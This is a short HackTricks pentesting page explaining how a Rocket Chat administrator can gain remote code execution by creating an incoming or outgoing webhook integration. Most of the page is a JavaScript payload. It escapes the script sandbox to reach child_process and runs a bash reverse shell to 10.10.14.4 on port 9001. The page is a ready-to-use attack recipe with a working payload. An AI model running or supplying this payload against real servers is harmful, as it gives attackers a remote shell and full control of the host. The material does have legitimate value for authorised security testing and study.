Search K
Appearance
Appearance
Other ways to support HackTricks:
If you are admin inside Rocket Chat you can get RCE.
Integrations
and select New Integration
and choose any: Incoming WebHook
or Outgoing WebHook
. /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
Other ways to support HackTricks: